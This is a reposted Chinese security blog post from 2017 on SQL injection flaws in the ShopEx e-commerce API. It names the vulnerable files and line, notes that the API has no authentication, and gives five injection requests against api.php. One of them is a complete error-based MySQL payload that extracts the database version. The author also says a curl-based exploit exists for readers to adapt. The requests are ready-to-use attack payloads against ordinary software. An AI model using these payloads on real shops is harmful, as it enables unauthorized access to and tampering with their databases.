shopex最新版API注入漏洞分析附利用exp

独自等待 2017年5月12日01:35:36评论494 views字数 1128阅读3分45秒阅读模式

缺陷文件:

\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php

core\api\payment\1.0\api_b2b_2_0_payment_cfg.php

第44行 $data['columns'] 未做过滤导致注入

exp:


外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.

注射1:

http://www.waitalone.cn/api.php POST

act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#

注射2:

http://www.waitalone.cn/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}

注射3:

http://www.waitalone.cn/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx

注射4:

http://www.waitalone.cn/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1

注射5:

http://www.waitalone.cn/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx

自己整的一个exp,利用curl来提交数据包,所以要求你的电脑需要支持curl,大家可以利用上面的exp自己改改。

shopex_api注入

转自:http://www.lpboke.com/shopex%E6%9C%80%E6%96%B0%E7%89%88%E7%9A%84api%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E9%99%84%E5%88%A9%E7%94%A8exp.html



from www.waitalone.cn.thanks for it.

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月12日01:35:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   shopex最新版API注入漏洞分析附利用exphttp://cn-sec.com/archives/50249.html

发表评论

匿名网友 填写信息